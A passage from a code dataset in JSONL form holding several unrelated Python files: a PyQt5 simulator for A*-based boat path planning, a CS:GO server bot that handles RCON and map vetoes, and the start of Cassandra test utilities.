run\n\n#---------------------------------------------------------------------|\n\n#bin_list = (\"xeb_server\",\"aux\")\n#src_script = \"compile.sh\"\n#bin_script = \"run.sh\"\n#\n#if(False):\n# success = compileFunc(bin_list, src_script = src_script, bin_script = bin_script)\n#else:\n# success = True\n#\n#print(\" \")\n#if(success):\n# print(\"No fatal errors detected, see above for runtime messesges\")\n#else:\n# print(\"Fatal error detected! See above for runtime errors\")\n#print(\" \")\n","sub_path":"program_scaffolding/compile.py","file_name":"compile.py","file_ext":"py","file_size_in_byte":14910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"584494726","text":"# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\nimport math\r\nimport sys\r\n\r\nfrom PyQt5.QtWidgets import QApplication, QDialog, QGraphicsScene, QStatusBar\r\nfrom PyQt5.QtGui import QPen, QBrush\r\nfrom PyQt5.Qt import QTimer\r\nfrom PyQt5.QtCore import Qt, QLineF\r\nfrom PyQt5.QtTest import QTest\r\n\r\nfrom A_star_Simulation_Window import UI_Simulator\r\n\r\n\"\"\"\r\n수정해야 할 것 :\r\n1) 특정 조건에서 Stuck 되는 것 : 알고리즘 문제인지, gain 값 문제인지 확인! 
-> Stuck 되었을 때 처리하는 코드 추가\r\n-> h = 0으로 했을 때 stuck은 안되지만 목적지 쪽으로 못감(당연하겠지...)\r\n# 2) Simulator에 Gain 값 조정할 수 있게 설정, 현위치 등 Board 표시하기\r\n# 3) 초깃값 여러군데 통일\r\n4) Reset, Pause 기능 잘 안 되는 것\r\n5) 초기 heading이 잘 들어가는지 확인\r\n6) obstacle, 시작점, 도착점도 마우스로 찍어서 설정할 수 있게 하는 기능\r\n7) heading을 변경했을 때 normalize해야 함\r\n8) 넘파이 배열을 스마트하게 쓸 수 있는 방법 이용\r\n9) 헤딩 회전에서 각도가 마이너스로 잘 들어가는지, 180도 이상인 둔각에서는 잘 되는지 필시 확인!\r\n# 10) 휴리스틱에도 gain 값 곱해주는 것 고려\r\n11) lineout 함수에서 오른쪽 벡터와 선이 아예 일치할 경우 등 예외처리 꼭 보기!\r\n12) 헤딩 방향으로 장애물 자동 할당 기능\r\n13) 닫기 버튼 누르면 프로세스 종료되게\r\n14) trajectory 그릴 때 마지막 점까지 그릴 수 있도록(?)\r\n15) 시뮬레이터 배 모양으로 바꾸기\r\n16) 시뮬레이터 헤딩 표시하기\r\n17) Status Bar에 마우스 위치 표시\r\n18) 5/10단위로 그래픽뷰에 격자 그리기\r\n# 19) start 버튼 전에 그리드 그려지도록 함수 추가\r\n20) search 포인트, 그 주변 f 계산중인 8방위 표시\r\n# 21) 도착지는 X나 네모로 다르게 표시, Range 표시\r\n22) board 좌표 표시할 때는 자릿수 맞추도록 format\r\n\"\"\"\r\n\r\n\r\nclass Obstacle:\r\n def __init__(self):\r\n self.ob_list = np.array([[1, 2], [2, 2], [3, 2], [4, 2], [5, 2], [6, 2], [7, 2], [8, 2], [9, 2], [10, 2],\r\n [11, 2], [12, 2], [13, 2], [14, 2], [15, 2], [16, 2], [17, 2], [18, 2], [19, 2], [20, 2],\r\n [21, 6], [22, 6], [23, 6], [24, 6], [25, 6], [26, 6], [27, 6], [28, 6], [29, 6],\r\n [17, 10], [18, 10], [19, 10], [17, 11], [18, 11], [19, 11],\r\n [24, 18], [24, 19], [24, 20], [24, 21], [24, 22], [24, 23]])\r\n\r\n\r\nclass PathPlanner:\r\n def __init__(self):\r\n self.edge_points = np.array([[0, 0], [30, 0], [30, 30], [0, 30]])\r\n\r\n self.obstacle = Obstacle()\r\n self.ob_list = self.obstacle.ob_list\r\n\r\n self.start_pos = np.array([1, 1])\r\n self.start_heading = np.array([1, 0])\r\n self.cur_pos = self.start_pos #[x, y] 현재 배가 있는 위치\r\n self.cur_heading = np.array([1, 0]) #[x, y] 벡터!, normalize 수시로 필요!\r\n self.end_pos = [20, 20]\r\n\r\n self.obstacle_search_range = 1\r\n self.predict_step = 5\r\n self.predict_step_size = 1\r\n\r\n self.g_value_rotate_gain_45 = 1\r\n self.g_value_rotate_gain_90 = 1.5\r\n self.g_value_rotate_gain_180 = 2\r\n self.h_value_gain = 0.7\r\n\r\n self.move_size = 1\r\n\r\n self.past_path = np.array([self.start_pos])\r\n self.trajectory = np.zeros((1, 2)) # [x, y]\r\n\r\n self.arrival_range = 1\r\n\r\n self.make_trajectory()\r\n\r\n def is_finished(self):\r\n if math.sqrt((self.cur_pos[0]-self.end_pos[0])**2 + (self.cur_pos[1]-self.end_pos[1])**2) <= self.arrival_range:\r\n return True\r\n else:\r\n return False\r\n\r\n def make_trajectory(self):\r\n search_center = np.array([self.cur_pos])\r\n predict_heading = self.cur_heading\r\n\r\n search_center, predict_heading = self.best_point(search_center, predict_heading)\r\n\r\n self.trajectory = search_center #초기화\r\n\r\n for i in range(self.predict_step - 1):\r\n search_center, predict_heading = self.best_point(search_center, predict_heading)\r\n self.trajectory = np.append(self.trajectory, search_center, axis=0)\r\n\r\n def best_point(self, search_center, predict_heading):\r\n min_f_value = 10000000\r\n best_point = np.zeros((0, 2))\r\n best_heading = np.zeros((0, 2))\r\n points = self.predict_step_size * np.array(\r\n [[1, 0], [1, 1], [0, 1], [-1, 1], [-1, 0], [-1, -1], [0, -1], [1, -1]])\r\n for i in range(8): #더 좋은 방법 있나 찾기\r\n points[i][0] += search_center[0][0]\r\n points[i][1] += search_center[0][1]\r\n\r\n for p in points:\r\n if self.is_line_out(p):\r\n continue\r\n if self.is_obstacle_in(p):\r\n continue\r\n\r\n # g값 중 시작부터 거리를 계산함\r\n distance_to_cur = (p[0] - self.cur_pos[0]) ** 2 + (p[1] - self.cur_pos[1]) ** 2\r\n\r\n # g값 중 회전 가중치를 계산함\r\n vec = p - search_center[0]\r\n vec = vec / math.sqrt((vec[0] ** 2 + vec[1] 
** 2))\r\n sin_theta = round(predict_heading[0] * vec[1] - predict_heading[1] * vec[0], 5)\r\n theta = math.asin(sin_theta) * 180 / math.pi # degree 값\r\n\r\n distance_to_search = (p[0] - search_center[0][0]) ** 2 + (p[1] - search_center[0][1]) ** 2\r\n if 45 >= abs(theta):\r\n rotate_cost = distance_to_search * self.g_value_rotate_gain_45\r\n elif 90 >= abs(theta):\r\n rotate_cost = distance_to_search * self.g_value_rotate_gain_90\r\n else:\r\n rotate_cost = distance_to_search * self.g_value_rotate_gain_180\r\n\r\n # g값 합침\r\n g = distance_to_cur + rotate_cost\r\n\r\n # h값을 계산함\r\n h = ((p[0] - self.end_pos[0]) ** 2 + (p[1] - self.end_pos[1]) ** 2) * self.h_value_gain\r\n\r\n # f값 총합\r\n f = g + h\r\n\r\n # 최소 f 값 찾기\r\n if min_f_value > f:\r\n min_f_value = f\r\n best_point = np.array([p])\r\n best_heading = vec\r\n\r\n return best_point, best_heading\r\n\r\n def is_line_out(self, point):\r\n crossed = 0\r\n for i in range(len(self.edge_points)):\r\n j = (i + 1) % len(self.edge_points)\r\n if (self.edge_points[i][1] > point[1]) != (self.edge_points[j][1] > point[1]):\r\n intersection = float((self.edge_points[j][0] - self.edge_points[i][0]) * (\r\n point[1] - self.edge_points[i][1]) / (\r\n self.edge_points[j][1] - self.edge_points[i][1]) +\r\n self.edge_points[i][0])\r\n if point[0] < intersection:\r\n crossed = crossed + 1\r\n return (crossed % 2) == 0 #밖에 있으면 true\r\n\r\n def is_obstacle_in(self, point):\r\n for i in range(len(self.ob_list)):\r\n distance_to_ob = math.sqrt((point[0] - self.ob_list[i][0]) ** 2 + (point[1] - self.ob_list[i][1]) ** 2)\r\n if distance_to_ob < self.obstacle_search_range:\r\n return True\r\n return False\r\n\r\n def move_boat(self):\r\n print(\"cur_pos : \", end='')\r\n print(self.cur_pos)\r\n \r\n vec = self.trajectory[0] - self.cur_pos\r\n vec = vec / math.sqrt((vec[0]**2 + vec[1]**2))\r\n next = vec * self.move_size\r\n \r\n self.cur_pos = self.cur_pos + next\r\n self.cur_heading = vec\r\n self.past_path = np.append(self.past_path, np.array([self.cur_pos]), axis=0)\r\n\r\n def obstacle_update(self): #lidar로 받아올 때 혹은 장애물 실시간 할당 시\r\n self.ob_list = self.obstacle.ob_list\r\n\r\n\r\nclass MainController:\r\n def __init__(self):\r\n self.path_planner = PathPlanner()\r\n # window.draw_grid(self.path_planner.edge_points, self.path_planner.start_pos, self.path_planner.ob_list, self.path_planner.end_pos)\r\n\r\n def board_show(self):\r\n cur_pos_str = \"( \" + str(round(self.path_planner.cur_pos[0], 2)) + \" , \" + str(round(self.path_planner.cur_pos[1], 2)) + \" )\"\r\n window.ui.cur_pos_lineEdit.setText(cur_pos_str)\r\n\r\n cur_heading_str = \"( \" + str(round(self.path_planner.cur_heading[0], 2)) + \" , \" + str(round(self.path_planner.cur_heading[1], 2)) + \" )\"\r\n window.ui.cur_heading_lineEdit.setText(cur_heading_str)\r\n\r\n def run_to_goal(self):\r\n while not self.path_planner.is_finished():\r\n self.path_planner.make_trajectory()\r\n self.path_planner.move_boat()\r\n self.board_show()\r\n window.draw(self.path_planner.edge_points, self.path_planner.cur_pos, self.path_planner.trajectory,\r\n self.path_planner.start_pos, self.path_planner.past_path, self.path_planner.ob_list,\r\n self.path_planner.end_pos, self.path_planner.arrival_range)\r\n QTest.qWait(100)\r\n print(\"----- MainController/run_to_goal/finished\")\r\n window.timer.stop()\r\n\r\n\r\nclass SimulationWindow(QDialog):\r\n controller = MainController()\r\n timer = QTimer()\r\n\r\n def __init__(self, parent=None):\r\n super(SimulationWindow, self).__init__(parent)\r\n self.ui = 
 controller = MainController()\r\n timer = QTimer()\r\n\r\n def __init__(self, parent=None):\r\n super(SimulationWindow, self).__init__(parent)\r\n self.ui = UI_Simulator()\r\n self.ui.set_UI(self)\r\n\r\n self.draw_grid(self.controller.path_planner.edge_points, self.controller.path_planner.start_pos,\r\n self.controller.path_planner.ob_list, self.controller.path_planner.end_pos,\r\n self.controller.path_planner.arrival_range)\r\n\r\n ##Simulator Initial Values\r\n self.ui.start_point_x_spinBox.setValue(1)\r\n self.ui.start_point_y_spinBox.setValue(1)\r\n self.ui.start_heading_x_spinBox.setValue(1)\r\n self.ui.start_heading_y_spinBox.setValue(0)\r\n self.ui.end_point_x_spinBox.setValue(20)\r\n self.ui.end_point_y_spinBox.setValue(20)\r\n self.ui.ob_search_range_doubleSpinBox.setValue(1)\r\n self.ui.predict_step_spinBox.setValue(5)\r\n self.ui.predict_step_size_doubleSpinBox.setValue(1)\r\n self.ui.g_value_rotate_gain_45_doubleSpinBox.setValue(1)\r\n self.ui.g_value_rotate_gain_90_doubleSpinBox.setValue(1.5)\r\n self.ui.g_value_rotate_gain_180_doubleSpinBox.setValue(2)\r\n self.ui.h_value_gain_doubleSpinBox.setValue(0.7)\r\n self.ui.move_size_doubleSpinBox.setValue(1)\r\n self.ui.arrival_range_doubleSpinBox.setValue(1)\r\n\r\n def do_calc(self):\r\n self.controller.path_planner.start_pos = np.array([self.ui.start_point_x_spinBox.value(), self.ui.start_point_y_spinBox.value()]) # does this get set correctly?\r\n self.controller.path_planner.cur_pos = self.controller.path_planner.start_pos\r\n self.controller.path_planner.cur_heading = np.array(\r\n [self.ui.start_heading_x_spinBox.value(), self.ui.start_heading_y_spinBox.value()])\r\n self.controller.path_planner.trajectory = np.zeros((1, 2)) # reset the planner's predicted trajectory\r\n self.controller.path_planner.past_path = np.array([self.controller.path_planner.start_pos])\r\n self.controller.path_planner.end_pos = np.array(\r\n [self.ui.end_point_x_spinBox.value(), self.ui.end_point_y_spinBox.value()])\r\n self.controller.path_planner.predict_step = self.ui.predict_step_spinBox.value()\r\n self.controller.path_planner.predict_step_size = self.ui.predict_step_size_doubleSpinBox.value()\r\n self.controller.path_planner.obstacle_search_range = self.ui.ob_search_range_doubleSpinBox.value()\r\n self.controller.path_planner.g_value_rotate_gain_45 = self.ui.g_value_rotate_gain_45_doubleSpinBox.value()\r\n self.controller.path_planner.g_value_rotate_gain_90 = self.ui.g_value_rotate_gain_90_doubleSpinBox.value()\r\n self.controller.path_planner.g_value_rotate_gain_180 = self.ui.g_value_rotate_gain_180_doubleSpinBox.value()\r\n self.controller.path_planner.h_value_gain = self.ui.h_value_gain_doubleSpinBox.value()\r\n self.controller.path_planner.move_size = self.ui.move_size_doubleSpinBox.value()\r\n self.controller.path_planner.arrival_range = self.ui.arrival_range_doubleSpinBox.value()\r\n\r\n self.controller.run_to_goal()\r\n\r\n def start(self):\r\n self.ui.status_lineEdit.setText(\"Start\")\r\n self.timer.start(50)\r\n self.timer.timeout.connect(self.do_calc)\r\n
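 # caution: connecting on every press of Start stacks additional connections, so do_calc may fire several times per timer tick; connecting once in __init__ would avoid that\r\n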
\r\n def pause(self):\r\n self.ui.status_lineEdit.setText(\"Pause\")\r\n self.timer.stop()\r\n\r\n def reset(self):\r\n self.ui.status_lineEdit.setText(\"Reset\")\r\n # should the self.controller values be reset here as well?\r\n self.ui.start_point_x_spinBox.setValue(1)\r\n self.ui.start_point_y_spinBox.setValue(1)\r\n self.ui.start_heading_x_spinBox.setValue(1)\r\n self.ui.start_heading_y_spinBox.setValue(0)\r\n self.ui.end_point_x_spinBox.setValue(20)\r\n self.ui.end_point_y_spinBox.setValue(20)\r\n self.ui.ob_search_range_doubleSpinBox.setValue(1)\r\n self.ui.predict_step_spinBox.setValue(5)\r\n self.ui.predict_step_size_doubleSpinBox.setValue(1)\r\n self.ui.g_value_rotate_gain_45_doubleSpinBox.setValue(1)\r\n self.ui.g_value_rotate_gain_90_doubleSpinBox.setValue(1.5)\r\n self.ui.g_value_rotate_gain_180_doubleSpinBox.setValue(2)\r\n self.ui.h_value_gain_doubleSpinBox.setValue(0.7)\r\n self.ui.move_size_doubleSpinBox.setValue(1)\r\n self.ui.arrival_range_doubleSpinBox.setValue(1)\r\n\r\n def draw_grid(self, edge_points, start_pos, obstacles, end_pos, arrival_range):\r\n scale = 0.05 # 1 pixel = 0.05 m // smaller values run off the map\r\n c = 1 / scale\r\n\r\n self.scene = GraphicsScene()\r\n self.ui.graphicsView.setScene(self.scene)\r\n\r\n ## draw the boundary\r\n pen_edges = QPen(Qt.black, 2)\r\n for i in range(len(edge_points)):\r\n j = (i + 1) % len(edge_points)\r\n self.scene.addLine(QLineF(c * edge_points[i][0], -c * edge_points[i][1],\r\n c * edge_points[j][0], -c * edge_points[j][1]), pen_edges)\r\n\r\n ## draw the obstacles\r\n pen_obstacle = QPen(Qt.black)\r\n for i in range(len(obstacles)):\r\n obstacle_diameter = c * 0.4\r\n self.scene.addEllipse(c * obstacles[i][0] - obstacle_diameter / 2,\r\n -c * obstacles[i][1] - obstacle_diameter / 2,\r\n obstacle_diameter, obstacle_diameter, pen_obstacle, QBrush(Qt.black))\r\n\r\n ## draw the boat\r\n pen_boat = QPen(Qt.green)\r\n diameter = c * 0.4\r\n self.scene.addEllipse(c * start_pos[0] - diameter / 2, -c * start_pos[1] - diameter / 2,\r\n diameter, diameter, pen_boat, QBrush(Qt.green))\r\n\r\n # ## draw the start point\r\n # pen_start = QPen(Qt.red)\r\n # diameter = c * 0.4\r\n # self.scene.addEllipse(c * start_pos[0] - diameter / 2, -c * start_pos[1] - diameter / 2,\r\n # diameter, diameter, pen_start, QBrush(Qt.red))\r\n\r\n ## draw the goal\r\n pen_arrival_range = QPen(Qt.blue, 0.8)\r\n diameter = c * arrival_range\r\n self.scene.addEllipse(c * end_pos[0] - diameter / 2, -c * end_pos[1] - diameter / 2,\r\n diameter, diameter, pen_arrival_range, QBrush(Qt.white))\r\n pen_end = QPen(Qt.blue)\r\n diameter = c * 0.4\r\n self.scene.addEllipse(c * end_pos[0] - diameter / 2, -c * end_pos[1] - diameter / 2,\r\n diameter, diameter, pen_end, QBrush(Qt.blue))\r\n\r\n def draw(self, edge_points, cur_pos, trajectory, start_pos, past_path, obstacles, end_pos, arrival_range):\r\n scale = 0.05 # 1 pixel = 0.05 m // smaller values run off the map\r\n c = 1/scale\r\n
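 # note: y-coordinates are negated in all the drawing calls below because Qt's scene y-axis grows downward while the board's y-axis grows upward\r\n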
\r\n self.scene = GraphicsScene()\r\n self.ui.graphicsView.setScene(self.scene)\r\n\r\n ## draw the boundary\r\n pen_edges = QPen(Qt.black, 2)\r\n for i in range(len(edge_points)):\r\n j = (i+1) % len(edge_points)\r\n self.scene.addLine(QLineF(c * edge_points[i][0], -c * edge_points[i][1],\r\n c * edge_points[j][0], -c * edge_points[j][1]), pen_edges)\r\n\r\n ## draw the predicted trajectory\r\n pen_trajectory = QPen(Qt.red)\r\n for i in range(len(trajectory)-1):\r\n self.scene.addLine(QLineF(c * trajectory[i][0], -c * trajectory[i][1],\r\n c * trajectory[i+1][0], -c * trajectory[i+1][1]), pen_trajectory)\r\n\r\n ## draw the past path\r\n pen_pastPath = QPen(Qt.green)\r\n if len(past_path) > 1:\r\n for i in range(len(past_path) - 1):\r\n self.scene.addLine(QLineF(c * past_path[i][0], -c * past_path[i][1],\r\n c * past_path[i + 1][0], -c * past_path[i + 1][1]), pen_pastPath)\r\n\r\n ## draw the obstacles\r\n pen_obstacle = QPen(Qt.black)\r\n for i in range(len(obstacles)):\r\n obstacle_diameter = c * 0.4\r\n self.scene.addEllipse(c * obstacles[i][0] - obstacle_diameter/2, -c * obstacles[i][1] - obstacle_diameter/2,\r\n obstacle_diameter, obstacle_diameter, pen_obstacle, QBrush(Qt.black))\r\n\r\n ## draw the boat\r\n pen_boat = QPen(Qt.green)\r\n diameter = c * 0.4\r\n self.scene.addEllipse(c * cur_pos[0] - diameter / 2, -c * cur_pos[1] - diameter / 2,\r\n diameter, diameter, pen_boat, QBrush(Qt.green))\r\n\r\n ## draw the start point\r\n pen_start = QPen(Qt.red)\r\n diameter = c * 0.4\r\n self.scene.addEllipse(c * start_pos[0] - diameter / 2, -c * start_pos[1] - diameter / 2,\r\n diameter, diameter, pen_start, QBrush(Qt.red))\r\n\r\n ## draw the goal\r\n pen_arrival_range = QPen(Qt.blue, 0.8)\r\n diameter = c * arrival_range\r\n self.scene.addEllipse(c * end_pos[0] - diameter / 2, -c * end_pos[1] - diameter / 2,\r\n diameter, diameter, pen_arrival_range, QBrush(Qt.white))\r\n pen_end = QPen(Qt.blue)\r\n diameter = c * 0.4\r\n self.scene.addEllipse(c * end_pos[0] - diameter / 2, -c * end_pos[1] - diameter / 2,\r\n diameter, diameter, pen_end, QBrush(Qt.blue))\r\n\r\n # self.status_bar = self.statusBar() #AttributeError: 'SimulationWindow' object has no attribute 'statusBar'\r\n\r\n # def mouseMoveEvent(self, event):\r\n # mouse_pt = \"Mouse Point : x={0},y={1}, global={2},{3}\".format(event.x(), event.y(), event.globalX(),\r\n # event.globalY())\r\n # # self.status_bar().showMessage(mouse_pt)\r\n # # print(mouse_pt)\r\n # self.ui.status_lineEdit.setText(mouse_pt)\r\n\r\n\r\nclass GraphicsScene(QGraphicsScene):\r\n def __init__(self, parent=None):\r\n QGraphicsScene.__init__(self, parent=None)\r\n\r\n # def mousePressEvent(self, event): # should this be used instead?\r\n # global goal_from_picture_x, goal_from_picture_y\r\n #\r\n # goal_from_picture_x = (event.scenePos().x() - 10) * 0.05\r\n # goal_from_picture_y = -(event.scenePos().y() - 50) * 0.05\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n window = SimulationWindow()\r\n window.show()\r\n sys.exit(app.exec_())\r\n","sub_path":"A_star/Simulator/A_star_Simulation.py","file_name":"A_star_Simulation.py","file_ext":"py","file_size_in_byte":19485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"186157644","text":"from srcds.rcon import RconConnection, RconAuthError\nfrom random import choice\nimport config as cfg\nimport stuff\nimport logging\n\n\n\nclass CsServer:\n def __init__(self, bot, addr, token):\n self.bot = bot\n addr = addr.split(':')\n self.addr = addr[0]\n self.rconPort = addr[1]\n self.token = token\n\n self.live = False\n\n self.format = \"bo1\"\n self.pool = cfg.pool\n self.map = \"\"\n self.maps = []\n self.picked = []\n self.banned = []\n self.vetoTurn = \"\"\n\n self.freeze = False\n self.paused = False\n self.score = \"?\"\n self.readyStatus = {\"TERRORIST\": False, \"CT\": False}\n self.teamNames = {\"TERRORIST\": \"Terrorists\", \"CT\": \"Counter-Terrorists\"}\n self.players = {} #steam id : team\n\n print(\"Server added: \", self.addr, \":\", self.rconPort, \", token: \", self.token)\n logging.info(\"Server added: %s:%s, token: %s\", self.addr, self.rconPort, self.token)\n self.rcon(\"say Hi! I'm AppelsiiniBot!\")\n self.rcon(stuff.exports[\"CONFIG\"]) # TODO: why does the last say command not go through (the message does not show up on the server)?\n
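 # note: Source RCON commands are length-limited, so rcon() below sends short commands as-is and splits long ones at ';' boundaries into sub-1000-character chunks\n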
\n def rcon(self, command):\n try:\n conn = RconConnection(self.addr, port=self.rconPort, password=cfg.rconPw)\n # The command has a 1000 char limit so split a big command into multiple commands\n if len(command) < 1000:\n conn.exec_command(command)\n else:\n while len(command) > 1000:\n i = command.rfind(\";\", 0, 1000)\n if i == -1:\n logging.error(\"Rcon-error: Over 1000 char command without a ';'\")\n return\n conn.exec_command(command[0:i+1])\n command = command[i+1:]\n conn.exec_command(command)\n print(command)\n except RconAuthError:\n logging.error(f'rcon: RconAuthError: addr={self.addr}, port={self.rconPort}')\n return\n except ConnectionRefusedError:\n logging.error(f'rcon: ConnectionRefusedError: addr={self.addr}, port={self.rconPort}')\n return\n except IndexError:\n logging.error(f'rcon: IndexError: {command}')\n\n def connected(self, match):\n # TODO: akl registered (and team) check\n print(\"connected, token:\", self.token)\n self.players[match[2]] = \"Unassigned\"\n\n def disconnect(self, match):\n # TODO: match pause on disconnect?\n print(\"disconnected, token:\", self.token)\n try:\n del self.players[match[2]]\n except KeyError:\n logging.error(f\"disconnect: KeyError, steamid {match[2]}\")\n return\n\n def switched_teams(self, match):\n print(\"switched_teams, token:\", self.token)\n self.players[match[2]] = match[4]\n\n def map_change(self, match):\n print(\"map_change, token:\", self.token)\n\n def map_end(self, match):\n print(\"map_end\")\n\n def round_start(self, match):\n print(\"round_start, token:\", self.token)\n\n def round_end(self, match):\n print(\"round_end, token:\", self.token)\n print(\"Winner: \", match[0], \" ct_score: \", match[1], \"t_score: \", match[2])\n\n def ready(self, match):\n team = match[3]\n if not self.live:\n if not self.readyStatus[team]:\n self.readyStatus[team] = True\n cmd = f'say Team {self.teamNames[team]} is ready!'\n self.rcon(cmd)\n\n if self.readyStatus[\"TERRORIST\"] and self.readyStatus[\"CT\"]:\n # start match\n print(\"ready\")\n self.rcon(\"say Starting match\")\n else:\n if self.paused:\n if not self.readyStatus[team]:\n self.readyStatus[team] = True\n cmd = f'say Team {self.teamNames[team]} is ready!'\n self.rcon(cmd)\n if self.readyStatus[\"TERRORIST\"] and self.readyStatus[\"CT\"]:\n # TODO: actually unpause the match here\n self.rcon(\"say Unpausing the match.\")\n
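 # note (veto flow, assuming the standard 7-map pool): bo1 alternates bans until the last map is auto-picked; bo3 takes two bans, then two picks, then two more bans, with the decider auto-picked\n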
\n # Starts the veto process\n def start(self, match):\n # TODO: do we want to prevent starts with fewer/more than 10 players?\n # TODO: how is the team name decided? before start, before ready, or from the server (hopefully)?\n self.resetGameState()\n terrorists = 0\n cts = 0\n teams = self.players.values()\n for i in teams:\n if i == \"TERRORIST\":\n terrorists += 1\n elif i ==\"CT\":\n cts += 1\n\n self.pool = cfg.pool\n self.vetoTurn = choice([\"TERRORIST\", \"CT\"])\n self.rcon(stuff.exports[\"VETO\"].format(self.vetoTurn, self.pool))\n return\n\n def pick(self, match):\n if self.live or self.vetoTurn == \"\":\n return\n\n if match[3] != self.vetoTurn:\n self.rcon(f\"say \\x10It's not your turn, {self.teamNames[match[3]]}!\")\n return\n if self.format == \"bo1\":\n self.rcon(f\"say \\x10There's no picking in a best of 1! Try banning a map instead. \\x06{self.pool}\")\n return\n if self.format == \"bo3\" and len(self.pool) in [4, 5]:\n cmd = match[4].split()\n try:\n if cmd[1] in self.pool:\n self.picked.append(cmd[1])\n self.pool.remove(cmd[1])\n if self.vetoTurn == \"TERRORIST\":\n self.vetoTurn = \"CT\"\n else:\n self.vetoTurn = \"TERRORIST\"\n if len(self.picked) == 1:\n self.rcon(f'say \\x10{self.teamNames[match[3]]} picked {cmd[1]}. {self.teamNames[self.vetoTurn]},'\n f' your turn to pick \\x06{self.pool}')\n else:\n self.rcon(\n f'say \\x10{self.teamNames[match[3]]} picked {cmd[1]}. {self.teamNames[self.vetoTurn]},'\n f' your turn to ban \\x06{self.pool}')\n\n except IndexError:\n self.rcon(\"say \\x10I don't understand.\")\n else:\n self.rcon(f\"say \\x10{self.teamNames[self.vetoTurn]} it's your turn to \\x06!ban \\x10a map. \\x06{self.pool}\")\n\n def ban(self, match):\n if self.live or self.vetoTurn == \"\":\n return\n if match[3] != self.vetoTurn:\n self.rcon(f\"say \\x10It's not your turn, {self.teamNames[match[3]]}!\")\n return\n cmd = match[4].split(\" \")\n try:\n if self.format == \"bo3\" and len(self.pool) in [4, 5]:\n self.rcon(f\"say \\x10{self.teamNames[self.vetoTurn]}, it's your turn to \\x06!pick\\x10 a map. \\x06{self.pool}\")\n return\n if cmd[1] in self.pool:\n self.banned.append(cmd[1])\n self.pool.remove(cmd[1])\n if self.vetoTurn == \"TERRORIST\":\n self.vetoTurn = \"CT\"\n else:\n self.vetoTurn = \"TERRORIST\"\n if len(self.banned) == 6 or (self.format == \"bo3\" and len(self.banned) == 4):\n self.picked.append(self.pool[0])\n self.rcon(f'say \\x10{self.teamNames[match[3]]} banned {cmd[1]}. \\x06{self.pool[0]}'\n f' \\x10was automatically picked as the last map remaining.')\n else:\n self.rcon(f'say \\x10{self.teamNames[match[3]]} banned {cmd[1]}. {self.teamNames[self.vetoTurn]},'\n f' your turn. \\x06{self.pool}')\n elif cmd[1] in self.picked:\n self.rcon(f'say \\x10{cmd[1]} is already picked! {self.teamNames[self.vetoTurn]}s try banning again: \\x06{self.pool}')\n elif cmd[1] in self.banned:\n self.rcon(f'say \\x10{cmd[1]} is already banned! {self.teamNames[self.vetoTurn]}s try banning again: \\x06{self.pool}')\n else:\n self.rcon(\"say \\x10Failed to ban a map.\")\n except IndexError:\n self.rcon(\"say \\x10I don't understand\")\n\n def resetGameState(self):\n # TODO: think more carefully about whether all of these are really necessary, e.g. resetting the team names\n
 self.live = False\n self.format = \"bo1\"\n self.pool = cfg.pool\n self.map = \"\"\n self.maps = []\n self.picked = []\n self.banned = []\n self.vetoTurn = \"\"\n\n self.freeze = False\n self.paused = False\n self.score = \"?\"\n self.readyStatus = {\"TERRORIST\": False, \"CT\": False}\n self.teamNames = {\"TERRORIST\": \"Terrorists\", \"CT\": \"Counter-Terrorists\"}\n\n","sub_path":"csserver.py","file_name":"csserver.py","file_ext":"py","file_size_in_byte":8660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"63494045","text":"import fileinput\nimport functools\nimport os\nimport random\nimport re\nimport subprocess\nimport sys\nimport tempfile\nimport time\nimport unittest\nfrom distutils.version import LooseVersion\nfrom threading import Thread\n\nimport assertions\nfrom cassandra import ConsistencyLevel\nfrom cassandra.concurrent import execute_concurrent_with_args\nfrom cassandra.query import SimpleStatement\nfrom ccmlib.node import Node\nfrom nose.plugins.attrib import attr\nfrom nose.tools import assert_equal, assert_in, assert_true, assert_is_instance\n\nfrom dtest import CASSANDRA_DIR, DISABLE_VNODES, IGNORE_REQUIRE, debug\n\n\nclass RerunTestException(Exception):\n \"\"\"\n This exception can be raised to signal a likely harmless test problem. If fixing a test is reasonable, that should be preferred.\n\n Ideally this is used in conjunction with the 'flaky' decorator, allowing the test to be automatically re-run and passed.\n When raising this exception in methods decorated with @flaky(rerun_filter=requires_rerun), do so carefully.\n Avoid overly broad try/except blocks, otherwise real (intermittent) bugs could be masked.\n\n example usage:\n\n @flaky(rerun_filter=requires_rerun) # see requires_rerun method below in this module\n def some_flaky_test():\n # some predictable code\n # more predictable code\n\n try:\n # some code that occasionally fails for routine/predictable reasons (e.g. timeout)\n except SomeNarrowException:\n raise RerunTestException\n\n When the test raises RerunTestException, the flaky plugin will re-run the test and it will pass if the next attempt(s) succeed.\n \"\"\"\n\n\ndef requires_rerun(err, *args):\n \"\"\"\n For use in conjunction with the 'flaky' decorator and its rerun_filter argument. 
See RerunTestException above.\n\n Returns True if the given flaky failure data (err) is of type RerunTestException, otherwise False.\n \"\"\"\n # err[0] contains the type of the error that occurred\n return err[0] == RerunTestException\n\n\ndef rows_to_list(rows):\n new_list = [list(row) for row in rows]\n return new_list\n\n\ndef create_c1c2_table(tester, session, read_repair=None):\n tester.create_cf(session, 'cf', columns={'c1': 'text', 'c2': 'text'}, read_repair=read_repair)\n\n\ndef insert_c1c2(session, keys=None, n=None, consistency=ConsistencyLevel.QUORUM):\n if (keys is None and n is None) or (keys is not None and n is not None):\n raise ValueError(\"Expected exactly one of 'keys' or 'n' arguments to not be None; \"\n \"got keys={keys}, n={n}\".format(keys=keys, n=n))\n if n:\n keys = list(range(n))\n\n statement = session.prepare(\"INSERT INTO cf (key, c1, c2) VALUES (?, 'value1', 'value2')\")\n statement.consistency_level = consistency\n\n execute_concurrent_with_args(session, statement, [['k{}'.format(k)] for k in keys])\n\n\ndef query_c1c2(session, key, consistency=ConsistencyLevel.QUORUM, tolerate_missing=False, must_be_missing=False):\n query = SimpleStatement('SELECT c1, c2 FROM cf WHERE key=\\'k%d\\'' % key, consistency_level=consistency)\n rows = list(session.execute(query))\n if not tolerate_missing:\n assertions.assert_length_equal(rows, 1)\n res = rows[0]\n assert_true(len(res) == 2 and res[0] == 'value1' and res[1] == 'value2', res)\n if must_be_missing:\n assertions.assert_length_equal(rows, 0)\n\n\n# work for 